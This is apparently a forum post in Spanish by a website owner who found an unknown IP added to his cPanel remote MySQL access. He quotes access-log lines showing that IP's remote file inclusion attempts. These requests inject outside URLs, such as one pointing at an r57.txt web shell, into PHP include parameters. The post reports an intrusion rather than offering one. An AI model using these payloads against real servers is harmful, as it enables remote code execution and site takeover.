hace semanas NO entraba a mi cPanel...
Accedi al PhpMyAdmin para ver unas cosas...
Oh carambas!!, tengo IP dedicada para la conección!.
Al acceder al cPanel veo que alguien ha agregado una IP a las conexiones REMOTAS de MySQL...
Busco en los LOGS de acceso y descubro que esa IP ha intentado acceder a mi web con vars como:
Código PHP:
coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http: flackster.org photos myadmin temp ., ., ., r57.txt?
hosting coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http: flackster.org photos myadmin temp ., ., ., r57.txt?
/phpPgAdmin/sqledit.php?server=http://members.lycos.nl/pspmusicfeed/id.txt?
/include/main.php?config[search_disp]=true&include_dir=http://usuarios.arnet.com.ar/larry123/safe.txt?
Etc...
Ademas os digo:
Núnca agrego Conex remotas a MySQL... (Y tengo IP FIJA para Internet)...
Es un BUG de PhpMyAdmin?
Es un BUG de cPanel?
Con exploits a PHP pueden haber agregado ESA IP a mi sistema ?
Que pesadilla!!!....